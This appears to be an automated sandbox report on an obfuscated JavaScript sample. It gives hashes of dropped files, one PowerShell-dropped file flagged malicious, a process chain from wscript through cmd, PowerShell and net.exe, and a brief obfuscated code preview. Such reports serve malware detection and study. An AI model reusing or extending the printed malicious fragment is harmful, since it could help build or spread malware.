SHA-512: | BFF670499BB021FB2FE1343B04423A0EA8EACACCD5F5FAFED61064F0CCA7283DA34CFBC52160D336B993C4F5F0E04A420568218A16C5E548AB1B50D2B350BA60 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.306615258472006 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfbPtdPeUkwRe9:YvXKXSQrT5LjIPWFGDV8Ukee9 |
MD5: | 009939F43083C4C8A3B14EAF2E7A5AC0 |
SHA1: | 1B6DC7A02B470F3D4B23CB1983D2D717A85A0B11 |
SHA-256: | A2C5AD81C31AABA45BBCC00DDCB70FABC08851EFD150971D0A8A2F27BD80FE3F |
SHA-512: | AC0BFD553C6EEAD6CCC1A73A14C223CA5ECBA15C812D1F6FB2F4C8A35661E4B83B881D5B831C46B35CD476AFB65B2ABF0C3E64EFA879A4918983ECC1DC76C61D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.299011074065567 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJf21rPeUkwRe9:YvXKXSQrT5LjIPWFG+16Ukee9 |
MD5: | 5759AAA149FE4D642259B4D5BED4A9F5 |
SHA1: | 850B8674134EA078000791F5351F822D2CA536A6 |
SHA-256: | F77D9EC421B80B284ABBC9B16C25F2C2D1AA2BEB8F35836EBC96175262595A50 |
SHA-512: | 734B8E9FDAFE070788FB913F0E59A90005C192E9FCD2FE69B1018E824DBA4C9E0D782C632016D5C8AAACA83A354218C33B570A754784B6C9AEEA3C6256293401 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.671660238150341 |
Encrypted: | false |
SSDEEP: | 24:Yv6XSgT5XIFamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSb:YvlEXOBgkDMUJUAh8cvMb |
MD5: | 7502E49DB03CF1B085F74E9F3755360A |
SHA1: | 1475004DC23F47367B562E15CCC018FAE428258E |
SHA-256: | F15BBA156600902FD311138F24C2BA137AEB238812605825ED0266ABDC5240D3 |
SHA-512: | 98AC06C3FE1B51BB4293D14096E7869AA25AE45265AD65C3BD9E46B0D9EFC2FAD14366A5DF200AF0EC4CD2B4D361A0FFE7CB6741E3429CEB08EFDBBD95265522 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.273845558520112 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJfshHHrPeUkwRe9:YvXKXSQrT5LjIPWFGUUUkee9 |
MD5: | 8233DDF21A9774FC9DCF4727850BF970 |
SHA1: | 26F5A156D5BD033B7DBE622A08A81583C131F501 |
SHA-256: | 216EEBE5FEF8BF8E283C7C2B3A3D00D386B2EF421D2A4C729C0CBCF566ACC0E8 |
SHA-512: | EB61F3EC0CD56C775122E453A0349A4D80BCD3FCC167B758433307567E3F3A8FCF79F7CE4A84ACE3E4415EE33EA24295404C10152CDB4ACB2F6C9439EFD5FADE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.28117965154218 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXXKnEJWO4mSg1c2LjcWkHvR0YyuoAvJTqgFCrPeUkwRe9:YvXKXSQrT5LjIPWFGTq16Ukee9 |
MD5: | B6E6A0C8EC45143785AAEC081E2DBB99 |
SHA1: | 2D385AD26AA348EB14C9A1DA640209818D8FFED1 |
SHA-256: | 8EC2689BA1FEF9DA3AE2DF9CDE82EF6C10B772B8FC92AD3A5CD2F79B9A3B3CE9 |
SHA-512: | 6D130C1ABEA0F2D70EAD17DDF87540B396B0CF15548A046FFA380951A39CD587D4D1A545862D3A13E15224FF583663EABBD2DB4C258CBA3FE83AC4254D1B9F42 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.140988858832914 |
Encrypted: | false |
SSDEEP: | 48:YDq+f4JlPPkNKLTHSbsbZ953XGiaH4c9eR9bW:Eq+ulPcNmSbsRX8HJ96q |
MD5: | 8B2460875CFB7369786DE2C4DBB6A182 |
SHA1: | E010206D0F3D6BEA224CD63CF94A84CD038DD9D5 |
SHA-256: | B2C2A36985F367FDD98F1BB493ED817C9AEF52296D74FDE3D7FE64052F6DB4DA |
SHA-512: | 9E1696E17F9A68993E8172197B9BA6A036CB07422715F3EBBCBDAD7D2505962AF8A2F2FD0C289CF69C966FE769A39C4C959C17461B8CCD5325DF208A06A049EB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3684382496440026 |
Encrypted: | false |
SSDEEP: | 24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuFqXKdqEKfS8EKfM1baNqF:Tll2GL7msMcKTlS8fcsuzfIo |
MD5: | FC2A5EBA8C4AFA5517E1D8B2CF5E4BD2 |
SHA1: | 0A8ED49E8DFB9606635C3D47357B913F9DB450CD |
SHA-256: | F0E42FD0E734BEA033FD1C34353D5CE1AC0272215E3B7B49D460494192985110 |
SHA-512: | 7ACBE7617340DD943AC85E7E4B23583D916CD0A014783BA461AC6EC6D09C088FF6B37E1ECB468005486E4DA1CD7A181A7660CFD4C3F0CAAE916B78630154AB48 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.844926348875341 |
Encrypted: | false |
SSDEEP: | 24:7+t0IsZ6bqyKn6ylSTofcNqDuFq+KdqEKfS8EKfM1banbqzRqLKufx/XYKQvGJFz:7MUcKTlS8fcsuWfIwqGufl2GL7msD |
MD5: | 3B0F2E718B8D73D0B029222F271567CA |
SHA1: | 60CC1876B960443C6B0FE61998C19C6F47157391 |
SHA-256: | B4E2BEA559687CACF564CBF80A0FD373CB6590B0774F00903B0A60F9E43BC453 |
SHA-512: | 45DF3E69F6EC92D81B7A16432AFBF6425017AF2C97513C753B2CDB687E9938C1E95494584DF556DDFA8317AA6CD8874A74451C40D62E9917C42AC02DB2793B0E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgI6BHPccirop+T9+y7PlG9BzjYyu:6a6TZ44ADEI6pPCr++ZCfK |
MD5: | 6C4DD0BDC5C9E1496481BA8B2FC8B81E |
SHA1: | 7863622D51C0D284801E212F57F6CFCFC374FC43 |
SHA-256: | D0B38071A81FD3B62CCE2CC962BBD7D40B0D69F40C8AEEE132FF47AAF9A9FDBF |
SHA-512: | EFB8C0CA9E7AADEE5327D29FA04D7089F63E235461F123714EC0A1E9E343A85A9856C86C769023FF08952B1D6F98432AF24E9582C47C598E1C3C7450536155A3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllulbnolz:NllUc |
MD5: | F23953D4A58E404FCB67ADD0C45EB27A |
SHA1: | 2D75B5CACF2916C66E440F19F6B3B21DFD289340 |
SHA-256: | 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B |
SHA-512: | B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5030768995714583 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClhWl:Qw946cPbiOxDlbYnuRK+bBl |
MD5: | D73DE2EBC77EC4F2E970B1BBEF02FCFC |
SHA1: | 7BB8097174DA5163316E733F74FCFD7CC65138E3 |
SHA-256: | 58F6E4D36B75B2BCE3284A22A996244B660FC222007AD39D83352A8BA1791230 |
SHA-512: | E75D2B82A732C52496A2410141C560B2ED749C6134F966F00EAC8848B388DA5B496649EA15F3EE9D32B06DA0FE647A51892C93AA64A3D5D816FABA1588606F1A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 23-25-02-042.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.330589339471305 |
Encrypted: | false |
SSDEEP: | 384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink |
MD5: | 5BC0A308794F062FEC40F3016568DF9F |
SHA1: | 14149448191AB45E99011CBBEF39F2A9A03A0D15 |
SHA-256: | 00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473 |
SHA-512: | CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.350620005136207 |
Encrypted: | false |
SSDEEP: | 384:OvruT/xmlNi5jm5yCJf0sTq8RdCdSdnded+XGUGgG6G8GFGSucIMn1CJUWLeKwdC:cwjgj |
MD5: | 49A85B3872277DD5FF73FD268B273519 |
SHA1: | AFC736D4FEFEA47291125D2D91D5540F5F47454F |
SHA-256: | 600D15A81B2AFD2FE440FFB4D1911B0842D59180C6B13989EA8FAF54DF23EF44 |
SHA-512: | 73E8418BC7EED947F864EC5A27C7908662ADEFF490132277BC51BFFB2233624A7CD9F4BB85BDEB0A7765EB920864850BC95AE3100402BB38859E8B06AB28111C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.373994240322966 |
Encrypted: | false |
SSDEEP: | 192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbm7wcb/SIDfcbx:8qnXopZ50rvNbDk |
MD5: | 9A301D0C921F7B63C285CAC9F12A47D7 |
SHA1: | 0E33350451E531E7E0284FABC5C19F5581D04799 |
SHA-256: | 60AF0C470525096B5A8EE9E3B9FA7E4C9CEBFC1A1B41DE3A162F4F418E96BA1D |
SHA-512: | 12AFBA682F6AF003DB73C0B3466A38014D5CCBE12C4D9F6A2CE1328E2FE635AE46DC328BFF29CCF36B2056B62F2B1AD8230A2DFC59AF4C4AA1C2BD993365B005 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru |
MD5: | CA6B0D9F8DDC295DACE8157B69CA7CF6 |
SHA1: | 6299B4A49AB28786E7BF75E1481D8011E6022AF4 |
SHA-256: | A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7 |
SHA-512: | 9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.905540050926867 |
TrID: | |
File name: | 6734200751517017767.js |
File size: | 20'299 bytes |
MD5: | c357761c70e4b964fcaa389f16dc09b9 |
SHA1: | 9e9a89c461f6d434ea46d99802420b6098e7da34 |
SHA256: | b801aec94ccc40169d0472136592f0d5652c2022baf44df71369c55d49715210 |
SHA512: | 672f0733a6088277557dc743539b98797fc2a27cb543293304c61713824bc3eb7acdcda321205c1de44ebc893d9e2697b3c2927476bea12e258affc6469cdbc3 |
SSDEEP: | 384:cftl0JxQCoXqlaVigmnOlMe48MbrxAKyHXgrxVUX8FQLLZORSmrxkUv8av/rxOCH:cftlIFsVigm6Me48yVXvKmga |
TLSH: | C19262DEEAE44FA5CCDC406D1FCF21E372A110C850B862A9A012799E6171FB5F9D247E |
File Content Preview: | function fdpfkhjtk(){zsuwcdy=[1031,3079,5127,4103,2055,3072];var yjkakve=this[lstbbnsig+qosgvke+erahil+gwmgwmeuq+jivnz+bjyxf+cbpwzesd+zxcoqzzmc](this[rqqbwx+kuvocb+conviwci+erahil+omnoj+lstbbnsig+zxcoqzzmc][spluvrx+erahil+jivnz+qosgvke+zxcoqzzmc+jivnz+tig |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 23:24:53 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6756d0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 23:24:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff673680000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 23:24:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 23:24:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 23:24:58 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6153b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 23:24:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff673680000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 23:24:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b0750000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 23:24:59 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 23:24:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77afe0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 23:24:59 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function fdpfkhjtk() { |
|
1 | zsuwcdy = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
